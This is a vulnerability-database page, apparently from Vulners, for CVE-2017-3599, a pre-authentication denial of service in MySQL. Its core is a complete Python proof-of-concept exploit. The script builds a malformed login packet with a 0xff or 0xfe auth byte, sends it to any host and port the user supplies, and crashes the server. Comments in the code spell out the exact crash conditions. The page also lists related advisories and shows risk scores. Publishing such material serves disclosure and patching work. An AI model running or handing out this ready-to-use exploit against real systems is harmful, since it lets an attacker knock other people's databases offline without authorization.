Vulners
Lucene search
Pre-Auth MySQL remote DOS (Integer Overflow)(CVE-2017-3599)
| Reporter | Title | Published | Views | Family All 60 |
|---|---|---|---|---|
 | MySQL 5.6.35 / 5.7.17 Integer Overflow Exploit | 2 May 201700:00 | – | zdt |
 | Exploit for Integer Overflow or Wraparound in Oracle Mysql | 18 Apr 201717:08 | – | githubexploit |
 | Oracle MySQL 5.6.x < 5.6.36 Multiple Vulnerabilities | 20 Apr 201700:00 | – | nessus |
| Oracle MySQL 5.7.x < 5.7.18 Multiple Vulnerabilities | 20 Apr 201700:00 | – | nessus |
| Amazon Linux AMI : mysql56 (ALAS-2017-830) | 19 May 201700:00 | – | nessus |
| FreeBSD : MySQL -- multiple vulnerabilities (d9e01c35-2531-11e7-b291-b499baebfeaf) (Riddle) | 20 Apr 201700:00 | – | nessus |
| GLSA-201802-04 : MySQL: Multiple vulnerabilities | 20 Feb 201800:00 | – | nessus |
| MiracleLinux 7 : rh-mysql56-mysql-5.6.37-5.el7 (AXSA:2017-2301:01) | 16 Jan 202600:00 | – | nessus |
| MiracleLinux 4 : rh-mysql56-mysql-5.6.37-5.AXS4 (AXSA:2017-2302:01) | 16 Jan 202600:00 | – | nessus |
| MiracleLinux 4 : rh-mysql57-mysql-5.7.19-6.AXS4 (AXSA:2017-2329:01) | 16 Jan 202600:00 | – | nessus |
10
import socket
import sys
from struct import pack
'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
'''
if len(sys.argv)<2:
print "Usage: python " + sys.argv[0] + " host [port]"
exit(0)
else:
HOST = sys.argv[1]
if len(sys.argv)>2:
PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
else:
PORT = 3306
print "[+] Creating packet..."
'''
3 bytes Packet lenth
1 bytes Packet number
Login request:
Packet format (when the server is 4.1 or newer):
Bytes Content
----- ----
4 client capabilities
4 max packet size
1 charset number
23 reserved (always 0)
n user name, \0-terminated
n plugin auth data (e.g. scramble), length encoded
n database name, \0-terminated
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n client auth plugin name - \0-terminated string,
(if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''
# packet_len = '\x64\x00\x00'
packet_num = '\x01'
#Login request packet
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
packet_max = '\x00\x00\x00\x01' # max packet size (default)
packet_cset = '\x21' # charset (default)
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00' # username null terminated (default)
packet_auth = '\xff' # both \xff and \xfe crash the server
'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]
request = packet_len + packet_num + packet
print "[+] Connecting to host..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connected."
except:
print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
s.close()
print "[+] Exiting."
exit(0)
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
s.close()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Apr 2017 00:00Current
8.3High risk
Vulners AI Score8.3
EPSS0.89924